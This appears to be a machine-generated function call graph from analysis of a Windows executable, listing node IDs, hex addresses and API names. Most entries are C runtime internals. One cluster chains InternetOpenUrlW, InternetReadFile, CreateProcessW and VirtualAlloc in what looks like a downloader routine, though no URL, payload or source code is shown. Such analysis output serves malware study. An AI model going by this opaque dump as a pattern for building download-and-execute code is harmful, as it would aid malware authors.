16637->16638 16639 67c978 16638->16639 16640 67c993 TlsSetValue 16639->16640 16641 67b806 16639->16641 16640->16641 16641->16609 16642 67b816 16641->16642 16643 67b820 16642->16643 16645 67b826 16642->16645 16646 67c8e8 16643->16646 16645->16606 16647 67c7c2 ___vcrt_FlsSetValue 5 API calls 16646->16647 16648 67c902 16647->16648 16649 67c91a TlsFree 16648->16649 16650 67c90e 16648->16650 16649->16650 16650->16645 16652 678f38 GetStartupInfoW 16651->16652 16652->16491 16654 68bab2 16653->16654 16658 68bae4 16653->16658 16662 685c95 16654->16662 16658->16496 17215 68bd09 16659->17215 16663 685ca6 16662->16663 16664 685ca0 16662->16664 16668 685cac 16663->16668 16715 686f3e 16663->16715 16710 686eff 16664->16710 16686 685cb1 16668->16686 16738 68128d 16668->16738 16673 685cd8 16675 686f3e __dosmaperr 6 API calls 16673->16675 16674 685ced 16676 686f3e __dosmaperr 6 API calls 16674->16676 16677 685ce4 16675->16677 16678 685cf9 16676->16678 16727 6847ff 16677->16727 16679 685d0c 16678->16679 16680 685cfd 16678->16680 16733 685a08 16679->16733 16682 686f3e __dosmaperr 6 API calls 16680->16682 16682->16677 16685 6847ff ___free_lconv_mon 14 API calls 16685->16686 16687 68b8b4 16686->16687 17099 68ba09 16687->17099 16692 68b8f7 16692->16658 16695 68b91e 17124 68bb04 16695->17124 16696 68b910 16697 6847ff ___free_lconv_mon 14 API calls 16696->16697 16697->16692 16700 68b971 16704 68b99d 16700->16704 16707 6847ff ___free_lconv_mon 14 API calls 16700->16707 16701 68b956 16702 680d0e __dosmaperr 14 API calls 16701->16702 16703 68b95b 16702->16703 16706 6847ff ___free_lconv_mon 14 API calls 16703->16706 16705 68b9e6 16704->16705 17133 68b52d 16704->17133 16709 6847ff ___free_lconv_mon 14 API calls 16705->16709 16706->16692 16707->16704 16709->16692 16749 686d49 16710->16749 16712 686f1b 16713 686f24 16712->16713 16714 686f36 TlsGetValue 16712->16714 16713->16663 16716 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 16715->16716 16717 686f5a 16716->16717 16718 686f78 TlsSetValue 16717->16718 16719 685cc0 16717->16719 16719->16668 16720 6847a2 16719->16720 16725 6847af __dosmaperr 16720->16725 16721 6847ef 16766 680d0e 16721->16766 16722 6847da HeapAlloc 16724 6847ed 16722->16724 16722->16725 16724->16673 16724->16674 16725->16721 16725->16722 16763 681851 16725->16763 16728 68480a HeapFree 16727->16728 16729 684834 16727->16729 16728->16729 16730 68481f GetLastError 16728->16730 16729->16668 16731 68482c __dosmaperr 16730->16731 16732 680d0e __dosmaperr 12 API calls 16731->16732 16732->16729 16803 68589c 16733->16803 16945 68a6da 16738->16945 16742 6812c6 16744 682338 CallUnexpected 21 API calls 16742->16744 16743 6812a7 IsProcessorFeaturePresent 16746 6812b3 16743->16746 16747 6812d0 16744->16747 16745 68129d 16745->16742 16745->16743 16975 67e9f7 16746->16975 16750 686d79 16749->16750 16754 686d75 std::_Locinfo::_Locinfo_ctor 16749->16754 16750->16754 16755 686c7e 16750->16755 16753 686d93 GetProcAddress 16753->16754 16754->16712 16761 686c8f ___vcrt_FlsSetValue 16755->16761 16756 686d25 16756->16753 16756->16754 16757 686cad LoadLibraryExW 16758 686cc8 GetLastError 16757->16758 16759 686d2c 16757->16759 16758->16761 16759->16756 16760 686d3e FreeLibrary 16759->16760 16760->16756 16761->16756 16761->16757 16762 686cfb LoadLibraryExW 16761->16762 16762->16759 16762->16761 16769 68187d 16763->16769 16780 685d2b GetLastError 16766->16780 16768 680d13 16768->16724 16770 681889 ___scrt_is_nonwritable_in_current_image 16769->16770 16775 67ec95 EnterCriticalSection 16770->16775 16772 681894 CallUnexpected 16776 6818cb 16772->16776 16775->16772 16779 67ecdd LeaveCriticalSection 16776->16779 16778 68185c 16778->16725 16779->16778 16781 685d41 16780->16781 16785 685d47 16780->16785 16782 686eff __dosmaperr 6 API calls 16781->16782 16782->16785 16783 686f3e __dosmaperr 6 API calls 16784 685d63 16783->16784 16787 6847a2 __dosmaperr 12 API calls 16784->16787 16800 685d4b SetLastError 16784->16800 16785->16783 16785->16800 16788 685d78 16787->16788 16789 685d80 16788->16789 16790 685d91 16788->16790 16791 686f3e __dosmaperr 6 API calls 16789->16791 16792 686f3e __dosmaperr 6 API calls 16790->16792 16793 685d8e 16791->16793 16794 685d9d 16792->16794 16798 6847ff ___free_lconv_mon 12 API calls 16793->16798 16795 685db8 16794->16795 16796 685da1 16794->16796 16799 685a08 __dosmaperr 12 API calls 16795->16799 16797 686f3e __dosmaperr 6 API calls 16796->16797 16797->16793 16798->16800 16801 685dc3 16799->16801 16800->16768 16802 6847ff ___free_lconv_mon 12 API calls 16801->16802 16802->16800 16804 6858a8 ___scrt_is_nonwritable_in_current_image 16803->16804 16817 67ec95 EnterCriticalSection 16804->16817 16806 6858b2 16818 6858e2 16806->16818 16809 6859ae 16810 6859ba ___scrt_is_nonwritable_in_current_image 16809->16810 16822 67ec95 EnterCriticalSection 16810->16822 16812 6859c4 16823 685b8f 16812->16823 16814 6859dc 16827 6859fc 16814->16827 16817->16806 16821 67ecdd LeaveCriticalSection 16818->16821 16820 6858d0 16820->16809 16821->16820 16822->16812 16824 685b9e __Getctype 16823->16824 16826 685bc5 __Getctype 16823->16826 16824->16826 16830 68ce4e 16824->16830 16826->16814 16944 67ecdd LeaveCriticalSection 16827->16944 16829 6859ea 16829->16685 16831 68ce64 16830->16831 16833 68cece 16830->16833 16831->16833 16835 68ce97 16831->16835 16841 6847ff ___free_lconv_mon 14 API calls 16831->16841 16834 6847ff ___free_lconv_mon 14 API calls 16833->16834 16857 68cf1c 16833->16857 16836 68cef0 16834->16836 16837 68ceb9 16835->16837 16842 6847ff ___free_lconv_mon 14 API calls 16835->16842 16838 6847ff ___free_lconv_mon 14 API calls 16836->16838 16840 6847ff ___free_lconv_mon 14 API calls 16837->16840 16839 68cf03 16838->16839 16843 6847ff ___free_lconv_mon 14 API calls 16839->16843 16844 68cec3 16840->16844 16846 68ce8c 16841->16846 16847 68ceae 16842->16847 16848 68cf11 16843->16848 16849 6847ff ___free_lconv_mon 14 API calls 16844->16849 16845 68cf8a 16850 6847ff ___free_lconv_mon 14 API calls 16845->16850 16858 68c152 16846->16858 16886 68c5b1 16847->16886 16854 6847ff ___free_lconv_mon 14 API calls 16848->16854 16849->16833 16855 68cf90 16850->16855 16852 6847ff 14 API calls ___free_lconv_mon 16856 68cf2a 16852->16856 16854->16857 16855->16826 16856->16845 16856->16852 16898 68cfbf 16857->16898 16859 68c24c 16858->16859 16860 68c163 16858->16860 16859->16835 16861 68c174 16860->16861 16862 6847ff ___free_lconv_mon 14 API calls 16860->16862 16863 68c186 16861->16863 16864 6847ff ___free_lconv_mon 14 API calls 16861->16864 16862->16861 16865 68c198 16863->16865 16867 6847ff ___free_lconv_mon 14 API calls 16863->16867 16864->16863 16866 68c1aa 16865->16866 16868 6847ff ___free_lconv_mon 14 API calls 16865->16868 16869 68c1bc 16866->16869 16870 6847ff ___free_lconv_mon 14 API calls 16866->16870 16867->16865 16868->16866 16871 68c1ce 16869->16871 16872 6847ff ___free_lconv_mon 14 API calls 16869->16872 16870->16869 16873 68c1e0 16871->16873 16875 6847ff ___free_lconv_mon 14 API calls 16871->16875 16872->16871 16874 68c1f2 16873->16874 16876 6847ff ___free_lconv_mon 14 API calls 16873->16876 16877 68c204 16874->16877 16878 6847ff ___free_lconv_mon 14 API calls 16874->16878 16875->16873 16876->16874 16879 68c216 16877->16879 16880 6847ff ___free_lconv_mon 14 API calls 16877->16880 16878->16877 16881 68c228 16879->16881 16883 6847ff ___free_lconv_mon 14 API calls 16879->16883 16880->16879 16882 68c23a 16881->16882 16884 6847ff ___free_lconv_mon 14 API calls 16881->16884 16882->16859 16885 6847ff ___free_lconv_mon 14 API calls 16882->16885 16883->16881 16884->16882 16885->16859 16887 68c5be 16886->16887 16897 68c616 16886->16897 16888 68c5ce 16887->16888 16889 6847ff ___free_lconv_mon 14 API calls 16887->16889 16890 68c5e0 16888->16890 16891 6847ff ___free_lconv_mon 14 API calls 16888->16891 16889->16888 16892 6847ff ___free_lconv_mon 14 API calls 16890->16892 16894 68c5f2 16890->16894 16891->16890 16892->16894 16893 68c604 16896 6847ff ___free_lconv_mon 14 API calls 16893->16896 16893->16897 16894->16893 16895 6847ff ___free_lconv_mon 14 API calls 16894->16895 16895->16893 16896->16897 16897->16837 16899 68cfeb 16898->16899 16900 68cfcc 16898->16900 16899->16856 16900->16899 16904 68cad8 16900->16904 16903 6847ff ___free_lconv_mon 14 API calls 16903->16899 16905 68cbb6 16904->16905 16906 68cae9 16904->16906 16905->16903 16940 68c837 16906->16940 16909 68c837 __Getctype 14 API calls 16910 68cafc 16909->16910 16911 68c837 __Getctype 14 API calls 16910->16911 16912 68cb07 16911->16912 16913 68c837 __Getctype 14 API calls 16912->16913 16914 68cb12 16913->16914 16915 68c837 __Getctype 14 API calls 16914->16915 16916 68cb20 16915->16916 16917 6847ff ___free_lconv_mon 14 API calls 16916->16917 16918 68cb2b 16917->16918 16919 6847ff ___free_lconv_mon 14 API calls 16918->16919 16920 68cb36 16919->16920 16921 6847ff ___free_lconv_mon 14 API calls 16920->16921 16922 68cb41 16921->16922 16923 68c837 __Getctype 14 API calls 16922->16923 16924 68cb4f 16923->16924 16925 68c837 __Getctype 14 API calls 16924->16925 16926 68cb5d 16925->16926 16927 68c837 __Getctype 14 API calls 16926->16927 16928 68cb6e 16927->16928 16929 68c837 __Getctype 14 API calls 16928->16929 16930 68cb7c 16929->16930 16931 68c837 __Getctype 14 API calls 16930->16931 16932 68cb8a 16931->16932 16933 6847ff ___free_lconv_mon 14 API calls 16932->16933 16934 68cb95 16933->16934 16935 6847ff ___free_lconv_mon 14 API calls 16934->16935 16936 68cba0 16935->16936 16937 6847ff ___free_lconv_mon 14 API calls 16936->16937 16938 68cbab 16937->16938 16939 6847ff ___free_lconv_mon 14 API calls 16938->16939 16939->16905 16941 68c849 16940->16941 16942 68c858 16941->16942 16943 6847ff ___free_lconv_mon 14 API calls 16941->16943 16942->16909 16943->16941 16944->16829 16981 68a608 16945->16981 16948 68a71f 16952 68a72b ___scrt_is_nonwritable_in_current_image 16948->16952 16949 68a78d CallUnexpected 16958 68a7c3 CallUnexpected 16949->16958 16994 67ec95 EnterCriticalSection 16949->16994 16950 685d2b __dosmaperr 14 API calls 16957 68a75c CallUnexpected 16950->16957 16951 68a77b 16953 680d0e __dosmaperr 14 API calls 16951->16953 16952->16949 16952->16950 16952->16951 16952->16957 16954 68a780 16953->16954 16992 67ebf3 16954->16992 16957->16949 16957->16951 16964 68a765 16957->16964 16960 68a8fd 16958->16960 16961 68a800 16958->16961 16972 68a82e 16958->16972 16963 68a908 16960->16963 17026 67ecdd LeaveCriticalSection 16960->17026 16961->16972 16995 685bda GetLastError 16961->16995 16966 682338 CallUnexpected 21 API calls 16963->16966 16964->16745 16967 68a910 16966->16967 16969 685bda __Getctype 41 API calls 16973 68a883 16969->16973 16971 685bda __Getctype 41 API calls 16971->16972 17022 68a8a9 16972->17022 16973->16964 16974 685bda __Getctype 41 API calls 16973->16974 16974->16964 16976 67ea13 __fread_nolock CallUnexpected 16975->16976 16977 67ea3f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16976->16977 16978 67eb10 CallUnexpected 16977->16978 17091 678287 16978->17091 16980 67eb2e 16980->16742 16982 68a614 ___scrt_is_nonwritable_in_current_image 16981->16982 16987 67ec95 EnterCriticalSection 16982->16987 16984 68a622 16988 68a664 16984->16988 16987->16984 16991 67ecdd LeaveCriticalSection 16988->16991 16990 681292 16990->16745 16990->16948 16991->16990 17027 67eb3f 16992->17027 16994->16958 16996 685bf6 16995->16996 16997 685bf0 16995->16997 16999 686f3e __dosmaperr 6 API calls 16996->16999 17001 685bfa SetLastError 16996->17001 16998 686eff __dosmaperr 6 API calls 16997->16998 16998->16996 17000 685c12 16999->17000 17000->17001 17003 6847a2 __dosmaperr 14 API calls 17000->17003 17005 685c8a 17001->17005 17006 685c8f 17001->17006 17004 685c27 17003->17004 17008 685c2f 17004->17008 17009 685c40 17004->17009 17005->16971 17007 68128d CallUnexpected 39 API calls 17006->17007 17011 685c94 17007->17011 17012 686f3e __dosmaperr 6 API calls 17008->17012 17010 686f3e __dosmaperr 6 API calls 17009->17010 17013 685c4c 17010->17013 17019 685c3d 17012->17019 17014 685c50 17013->17014 17015 685c67 17013->17015 17016 686f3e __dosmaperr 6 API calls 17014->17016 17018 685a08 __dosmaperr 14 API calls 17015->17018 17016->17019 17017 6847ff ___free_lconv_mon 14 API calls 17017->17001 17020 685c72 17018->17020 17019->17017 17021 6847ff ___free_lconv_mon 14 API calls 17020->17021 17021->17001 17023 68a875 17022->17023 17024 68a8ad 17022->17024 17023->16964 17023->16969 17023->16973 17090 67ecdd LeaveCriticalSection 17024->17090 17026->16963 17028 67eb51 _Fputc 17027->17028 17033 67eb76 17028->17033 17034 67eb86 17033->17034 17035 67eb8d 17033->17035 17048 67da00 GetLastError 17034->17048 17039 67eb69 17035->17039 17052 67e9ce 17035->17052 17038 67ebc2 17038->17039 17055 67ec20 IsProcessorFeaturePresent 17038->17055 17042 67d880 17039->17042 17041 67ebf2 17043 67d88c 17042->17043 17044 67d8a3 17043->17044 17081 67da50 17043->17081 17046 67d8b6 17044->17046 17047 67da50 _Fputc 41 API calls 17044->17047 17047->17046 17049 67da19 17048->17049 17059 685ddc 17049->17059 17053 67e9f2 17052->17053 17054 67e9d9 GetLastError SetLastError 17052->17054 17053->17038 17054->17038 17056 67ec2c 17055->17056 17057 67e9f7 CallUnexpected 8 API calls 17056->17057 17058 67ec41 GetCurrentProcess TerminateProcess 17057->17058 17058->17041 17060 685def 17059->17060 17061 685df5 17059->17061 17063 686eff __dosmaperr 6 API calls 17060->17063 17062 686f3e __dosmaperr 6 API calls 17061->17062 17066 67da35 SetLastError 17061->17066 17064 685e0f 17062->17064 17063->17061 17065 6847a2 __dosmaperr 14 API calls 17064->17065 17064->17066 17067 685e1f 17065->17067 17066->17035 17068 685e3c 17067->17068 17069 685e27 17067->17069 17071 686f3e __dosmaperr 6 API calls 17068->17071 17070 686f3e __dosmaperr 6 API calls 17069->17070 17072 685e33 17070->17072 17073 685e48 17071->17073 17078 6847ff ___free_lconv_mon 14 API calls 17072->17078 17074 685e5b 17073->17074 17075 685e4c 17073->17075 17077 685a08 __dosmaperr 14 API calls 17074->17077 17076 686f3e __dosmaperr 6 API calls 17075->17076 17076->17072 17079 685e66 17077->17079 17078->17066 17080 6847ff ___free_lconv_mon 14 API calls 17079->17080 17080->17066 17082 67da9f 17081->17082 17083 67da5e GetLastError 17081->17083 17082->17044 17084 67da6d 17083->17084 17085 685ddc _Fputc 14 API calls 17084->17085 17086 67da8a SetLastError 17085->17086 17086->17082 17087 67daa6 17086->17087 17088 68128d CallUnexpected 39 API calls 17087->17088 17089 67daab 17088->17089 17090->17023 17092 678290 IsProcessorFeaturePresent 17091->17092 17093 67828f 17091->17093 17095 678b45 17092->17095 17093->16980 17098 678b08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17095->17098 17097 678c28 17097->16980 17098->17097 17100 68ba15 ___scrt_is_nonwritable_in_current_image 17099->17100 17107 68ba2f 17100->17107 17141 67ec95 EnterCriticalSection 17100->17141 17102 68ba3f 17108 6847ff ___free_lconv_mon 14 API calls 17102->17108 17109 68ba6b 17102->17109 17103 68b8de 17110 68b63b 17103->17110 17104 68128d CallUnexpected 41 API calls 17106 68baa8 17104->17106 17107->17103 17107->17104 17108->17109 17142 68ba88 17109->17142 17146 680d21 17110->17146 17113 68b65c GetOEMCP 17116 68b685 17113->17116 17114 68b66e 17115 68b673 GetACP 17114->17115 17114->17116 17115->17116 17116->16692 17117 684839 17116->17117 17118 684877 17117->17118 17122 684847 __dosmaperr 17117->17122 17120 680d0e __dosmaperr 14 API calls 17118->17120 17119 684862 HeapAlloc 17121 684875 17119->17121 17119->17122 17120->17121 17121->16695 17121->16696 17122->17118 17122->17119 17123 681851 std::_Facet_Register 2 API calls 17122->17123 17123->17122 17125 68b63b 43 API calls 17124->17125 17126 68bb24 17125->17126 17128 68bb61 IsValidCodePage 17126->17128 17132 68bb7c __fread_nolock 17126->17132 17127 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17129 68b94b 17127->17129 17130 68bb73 17128->17130 17128->17132 17129->16700 17129->16701 17131 68bb9c GetCPInfo 17130->17131 17130->17132 17131->17132 17132->17127 17134 68b539 ___scrt_is_nonwritable_in_current_image 17133->17134 17189 67ec95 EnterCriticalSection 17134->17189 17136 68b543 17190 68b57a 17136->17190 17141->17102 17145 67ecdd LeaveCriticalSection 17142->17145 17144 68ba8f 17144->17107 17145->17144 17147 680d3f 17146->17147 17148 680d38 17146->17148 17147->17148 17149 685bda __Getctype 41 API calls 17147->17149 17148->17113 17148->17114 17150 680d60 17149->17150 17154 684887 17150->17154 17155 68489a 17154->17155 17156 680d76 17154->17156 17155->17156 17162 68d09c 17155->17162 17158 6848e5 17156->17158 17159 6848f8 17158->17159 17160 68490d 17158->17160 17159->17160 17184 68baf1 17159->17184 17160->17148 17163 68d0a8 ___scrt_is_nonwritable_in_current_image 17162->17163 17164 685bda __Getctype 41 API calls 17163->17164 17165 68d0b1 17164->17165 17172 68d0f7 17165->17172 17175 67ec95 EnterCriticalSection 17165->17175 17167 68d0cf 17176 68d11d 17167->17176 17172->17156 17173 68128d CallUnexpected 41 API calls 17174 68d11c 17173->17174 17175->17167 17177 68d12b __Getctype 17176->17177 17179 68d0e0 17176->17179 17178 68ce4e __Getctype 14 API calls 17177->17178 17177->17179 17178->17179 17180 68d0fc 17179->17180 17183 67ecdd LeaveCriticalSection 17180->17183 17182 68d0f3 17182->17172 17182->17173 17183->17182 17185 685bda __Getctype 41 API calls 17184->17185 17186 68baf6 17185->17186 17187 68ba09 std::_Locinfo::_Locinfo_ctor 41 API calls 17186->17187 17188 68bb01 17187->17188 17188->17160 17189->17136 17200 67fbc5 17190->17200 17192 68b59c 17193 67fbc5 __fread_nolock 41 API calls 17192->17193 17194 68b5bb 17193->17194 17195 68b550 17194->17195 17196 6847ff ___free_lconv_mon 14 API calls 17194->17196 17197 68b56e 17195->17197 17196->17195 17214 67ecdd LeaveCriticalSection 17197->17214 17199 68b55c 17199->16705 17201 67fbd6 17200->17201 17209 67fbd2 _Yarn 17200->17209 17202 67fbdd 17201->17202 17205 67fbf0 __fread_nolock 17201->17205 17203 680d0e __dosmaperr 14 API calls 17202->17203 17204 67fbe2 17203->17204 17206 67ebf3 ___std_exception_copy 41 API calls 17204->17206 17207 67fc27 17205->17207 17208 67fc1e 17205->17208 17205->17209 17206->17209 17207->17209 17212 680d0e __dosmaperr 14 API calls 17207->17212 17210 680d0e __dosmaperr 14 API calls 17208->17210 17209->17192 17211 67fc23 17210->17211 17213 67ebf3 ___std_exception_copy 41 API calls 17211->17213 17212->17211 17213->17209 17214->17199 17216 680d21 std::_Locinfo::_Locinfo_ctor 41 API calls 17215->17216 17217 68bd1c 17216->17217 17217->16496 17219 674ff1 17218->17219 17220 674f40 17218->17220 17222 6712e0 std::ios_base::_Init 42 API calls 17219->17222 17221 674f4c _Yarn 17220->17221 17223 674f74 17220->17223 17226 674faf 17220->17226 17227 674fb8 17220->17227 17221->16499 17224 674ff6 17222->17224 17228 67829a std::_Facet_Register 42 API calls 17223->17228 17225 671240 Concurrency::cancel_current_task 42 API calls 17224->17225 17229 674f87 17225->17229 17226->17223 17226->17224 17231 67829a std::_Facet_Register 42 API calls 17227->17231 17233 674f90 _Yarn 17227->17233 17228->17229 17230 67ec03 std::ios_base::_Init 41 API calls 17229->17230 17229->17233 17232 675000 17230->17232 17231->17233 17233->16499 17235 6720ff ___scrt_uninitialize_crt 17234->17235 17236 672139 MultiByteToWideChar 17235->17236 17432 674dc0 17236->17432 17238 67217b MultiByteToWideChar InternetOpenW 17240 67226d InternetOpenUrlW 17238->17240 17241 6721d9 GetLastError 17238->17241 17242 67229e InternetCloseHandle 17240->17242 17243 6722aa InternetReadFile 17240->17243 17448 674820 17241->17448 17250 6721f6 17242->17250 17245 672349 InternetCloseHandle InternetCloseHandle 17243->17245 17246 6722f9 17243->17246 17249 672243 messages 17245->17249 17245->17250 17246->17245 17252 67230a 17246->17252 17253 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17249->17253 17250->17249 17256 6723b7 17250->17256 17252->17246 17474 675f30 17252->17474 17257 672266 17253->17257 17259 67ec03 std::ios_base::_Init 41 API calls 17256->17259 17257->16545 17258 67231e InternetReadFile 17258->17245 17258->17252 17260 6723bc CreateProcessW 17259->17260 17262 672576 MessageBoxW 17260->17262 17263 672559 WaitForSingleObject CloseHandle CloseHandle 17260->17263 17264 67258a 17262->17264 17263->17264 17265 6725b6 messages 17264->17265 17267 6725db 17264->17267 17266 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17265->17266 17268 6725cd 17266->17268 17269 67ec03 std::ios_base::_Init 41 API calls 17267->17269 17268->16545 17270 6725e0 17269->17270 17271 674f20 std::ios_base::_Init 42 API calls 17270->17271 17272 672640 17271->17272 17273 674f20 std::ios_base::_Init 42 API calls 17272->17273 17274 672674 17273->17274 17275 674f20 std::ios_base::_Init 42 API calls 17274->17275 17276 6726a8 17275->17276 17277 674f20 std::ios_base::_Init 42 API calls 17276->17277 17278 6726dc 17277->17278 17279 674f20 std::ios_base::_Init 42 API calls 17278->17279 17280 672710 17279->17280 17281 672ddb 17280->17281 17284 67272d 17280->17284 17282 672de0 17281->17282 17283 6712e0 std::ios_base::_Init 42 API calls 17281->17283 17286 671240 Concurrency::cancel_current_task 42 API calls 17282->17286 17283->17282 17285 67279f 17284->17285 17287 6727e7 17284->17287 17288 6727f4 17284->17288 17294 6727b2 _Yarn 17284->17294 17291 67829a std::_Facet_Register 42 API calls 17285->17291 17289 672de5 17286->17289 17287->17282 17287->17285 17293 67829a std::_Facet_Register 42 API calls 17288->17293 17288->17294 17290 67ec03 std::ios_base::_Init 41 API calls 17289->17290 17292 672dea 17290->17292 17291->17294 17295 67ec03 std::ios_base::_Init 41 API calls 17292->17295 17293->17294 17294->17289 17297 675590 std::ios_base::_Init 42 API calls 17294->17297 17298 672882 _Yarn 17294->17298 17296 672def 17295->17296 17299 67ec03 std::ios_base::_Init 41 API calls 17296->17299 17297->17298 17300 675590 std::ios_base::_Init 42 API calls 17298->17300 17301 67292a _Yarn 17298->17301 17303 672df4 17299->17303 17300->17301 17302 675590 std::ios_base::_Init 42 API calls 17301->17302 17306 6729d2 _Yarn messages 17301->17306 17302->17306 17305 674460 42 API calls 17303->17305 17309 672e5e 17303->17309 17304 672b1b messages 17307 674f20 std::ios_base::_Init 42 API calls 17304->17307 17305->17309 17306->17289 17306->17304 17312 672b50 17307->17312 17308 672000 std::ios_base::_Init 42 API calls 17317 672f5f 17308->17317 17310 674b70 71 API calls 17309->17310 17311 672eb6 17309->17311 17310->17311 17311->17308 17312->17292 17313 672b8f Sleep 17312->17313 17314 672b85 messages 17312->17314 17315 6720d0 77 API calls 17313->17315 17314->17313 17318 672bbb 17315->17318 17316 672f6f 17316->16545 17317->17316 17319 674580 42 API calls 17317->17319 17320 672bc7 VirtualAlloc 17318->17320 17324 672c04 messages 17318->17324 17319->17316 17321 672be1 _Yarn 17320->17321 17320->17324 17322 672bf2 VirtualFree 17321->17322 17322->17324 17323 672db9 messages 17325 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17323->17325 17324->17296 17324->17323 17326 672dd5 17325->17326 17326->16545 17328 67829f _Yarn 17327->17328 17329 6782b9 17328->17329 17330 681851 std::_Facet_Register 2 API calls 17328->17330 17332 671240 Concurrency::cancel_current_task 17328->17332 17329->16518 17330->17328 17331 6782c5 17331->17331 17332->17331 17333 6796fd CallUnexpected RaiseException 17332->17333 17334 67125c 17333->17334 17335 67949a ___std_exception_copy 41 API calls 17334->17335 17336 671283 17335->17336 17336->16518 17338 6756db 17337->17338 17339 6755ba 17337->17339 17340 6712e0 std::ios_base::_Init 42 API calls 17338->17340 17343 67561c 17339->17343 17344 675629 17339->17344 17346 6755d0 17339->17346 17341 6756e0 17340->17341 17342 671240 Concurrency::cancel_current_task 42 API calls 17341->17342 17351 6755e0 _Yarn 17342->17351 17343->17341 17343->17346 17348 67829a std::_Facet_Register 42 API calls 17344->17348 17344->17351 17345 67829a std::_Facet_Register 42 API calls 17345->17351 17346->17345 17347 67ec03 std::ios_base::_Init 41 API calls 17349 6756ea 17347->17349 17348->17351 17350 675699 _Yarn messages 17350->16525 17351->17347 17351->17350 17353 67634c std::ios_base::_Init 42 API calls 17352->17353 17354 6712ea 17353->17354 17355 67949a ___std_exception_copy 41 API calls 17354->17355 17356 671313 17355->17356 17356->16510 17358 67124e Concurrency::cancel_current_task 17357->17358 17359 6796fd CallUnexpected RaiseException 17358->17359 17360 67125c 17359->17360 17361 67949a ___std_exception_copy 41 API calls 17360->17361 17362 671283 17361->17362 17362->16516 17364 67eb3f ___std_exception_copy 41 API calls 17363->17364 17365 67ec12 17364->17365 17366 67ec20 __Getctype 11 API calls 17365->17366 17367 67ec1f 17366->17367 17369 67453b 17368->17369 17370 6744a4 17368->17370 17371 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17369->17371 17806 673c70 17370->17806 17373 674571 17371->17373 17373->16536 17374 67452a 17374->17369 17376 674580 42 API calls 17374->17376 17376->17369 17377 672000 std::ios_base::_Init 42 API calls 17377->17374 17379 6761c5 std::_Lockit::_Lockit 7 API calls 17378->17379 17380 674bab 17379->17380 17381 6761c5 std::_Lockit::_Lockit 7 API calls 17380->17381 17385 674bed 17380->17385 17382 674bcd 17381->17382 17386 67621d std::_Lockit::~_Lockit 2 API calls 17382->17386 17383 674c0c 17384 67621d std::_Lockit::~_Lockit 2 API calls 17383->17384 17387 674c14 17384->17387 17385->17383 17390 67829a std::_Facet_Register 42 API calls 17385->17390 17386->17385 17388 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17387->17388 17389 674c2e 17388->17389 17389->16538 17391 674c60 17390->17391 17392 6761c5 std::_Lockit::_Lockit 7 API calls 17391->17392 17393 674c8d 17392->17393 17394 674ccf 17393->17394 17395 674daa 17393->17395 17396 676616 std::_Locinfo::_Locinfo_ctor 68 API calls 17394->17396 17397 67638c codecvt 42 API calls 17395->17397 17398 674cd9 17396->17398 17399 674db4 17397->17399 17400 676661 std::_Locinfo::_Locinfo_dtor 68 API calls 17398->17400 17401 674cf3 17400->17401 17402 674d03 17401->17402 17403 67e8b9 __freea 14 API calls 17401->17403 17404 674d1a 17402->17404 17406 67e8b9 __freea 14 API calls 17402->17406 17403->17402 17405 674d31 17404->17405 17407 67e8b9 __freea 14 API calls 17404->17407 17408 674d48 17405->17408 17409 67e8b9 __freea 14 API calls 17405->17409 17406->17404 17407->17405 17410 674d5f 17408->17410 17411 67e8b9 __freea 14 API calls 17408->17411 17409->17408 17412 674d76 17410->17412 17414 67e8b9 __freea 14 API calls 17410->17414 17411->17410 17413 67621d std::_Lockit::~_Lockit 2 API calls 17412->17413 17415 674d88 17413->17415 17414->17412 17416 6764e6 std::_Facet_Register 42 API calls 17415->17416 17416->17383 17418 672022 17417->17418 17419 67201a 17417->17419 17418->16544 17420 6796fd CallUnexpected RaiseException 17419->17420 17421 672032 std::ios_base::_Init 17419->17421 17420->17421 17810 671f10 17421->17810 17423 672068 17424 6796fd CallUnexpected RaiseException 17423->17424 17425 672077 17424->17425 17426 67949a ___std_exception_copy 41 API calls 17425->17426 17427 6720a4 17426->17427 17427->16544 17429 6745e9 17428->17429 17430 6745be 17428->17430 17429->16543 17430->17429 17431 672000 std::ios_base::_Init 42 API calls 17430->17431 17431->17429 17433 674f08 17432->17433 17439 674ddd 17432->17439 17434 6712e0 std::ios_base::_Init 42 API calls 17433->17434 17436 674e6c 17434->17436 17435 674def 17435->17238 17440 67ec03 std::ios_base::_Init 41 API calls 17436->17440 17446 674e77 17436->17446 17437 674e2c 17438 674f03 17437->17438 17442 674e66 17437->17442 17444 671240 Concurrency::cancel_current_task 42 API calls 17438->17444 17439->17435 17439->17437 17439->17438 17441 674e91 17439->17441 17443 674f12 17440->17443 17441->17446 17447 67829a std::_Facet_Register 42 API calls 17441->17447 17445 67829a std::_Facet_Register 42 API calls 17442->17445 17444->17433 17445->17436 17446->17238 17447->17446 17449 674870 17448->17449 17450 674460 42 API calls 17449->17450 17455 6748c7 17449->17455 17450->17455 17451 672000 std::ios_base::_Init 42 API calls 17453 674a8e 17451->17453 17452 6721e6 17456 672e00 17452->17456 17453->17452 17454 674580 42 API calls 17453->17454 17454->17452 17455->17451 17457 672e45 17456->17457 17458 674460 42 API calls 17457->17458 17460 672e5e 17457->17460 17458->17460 17459 672000 std::ios_base::_Init 42 API calls 17464 672f5f 17459->17464 17461 674b70 71 API calls 17460->17461 17462 672eb6 17460->17462 17461->17462 17462->17459 17463 6721f0 17466 674ad0 17463->17466 17464->17463 17465 674580 42 API calls 17464->17465 17465->17463 17467 674b0d 17466->17467 17491 6746f0 17467->17491 17472 674460 42 API calls 17473 674b5e 17472->17473 17473->17250 17475 675f5d 17474->17475 17487 6760ad _Yarn 17474->17487 17476 675f83 17475->17476 17477 676122 17475->17477 17475->17487 17478 675f9d 17476->17478 17481 675fde 17476->17481 17482 675feb 17476->17482 17795 676140 17477->17795 17483 67829a std::_Facet_Register 42 API calls 17478->17483 17480 676127 17484 671240 